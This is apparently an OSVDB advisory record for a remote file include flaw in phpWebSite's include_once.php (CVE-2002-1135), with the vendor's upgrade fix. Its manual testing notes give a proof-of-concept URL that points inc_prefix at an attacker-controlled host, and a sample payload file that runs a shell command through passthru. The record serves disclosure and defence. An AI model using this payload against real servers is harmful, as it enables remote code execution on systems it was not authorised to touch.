phpWebSite modsecurity.php Remote File Include

2002-09-22T00:00:00
ID OSVDB:3848
Type osvdb
Reporter OSVDB
Modified 2002-09-22T00:00:00

Description

Vulnerability Description

phpWebSite contains a flaw that allows a remote attacker include arbitrary PHP files. Due to a lack of sanity checks in the include_once.php script, the inc_prefix variable can be used to include arbitrary PHP files on remote sites. Specially crafted PHP files with commands will be executed on the victim machine with the privileges of the web server.

Solution Description

Upgrade to version 0.8.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

phpWebSite contains a flaw that allows a remote attacker include arbitrary PHP files. Due to a lack of sanity checks in the include_once.php script, the inc_prefix variable can be used to include arbitrary PHP files on remote sites. Specially crafted PHP files with commands will be executed on the victim machine with the privileges of the web server.

Manual Testing Notes

http://[victim]/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/

--- htmlheader.php --- <? passthru("/bin/ls") ?> ----------------------

References:

Vendor URL: http://phpwebsite.appstate.edu/ Secunia Advisory ID:7145 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-09/0275.html ISS X-Force ID: 10164 CVE-2002-1135 Bugtraq ID: 5779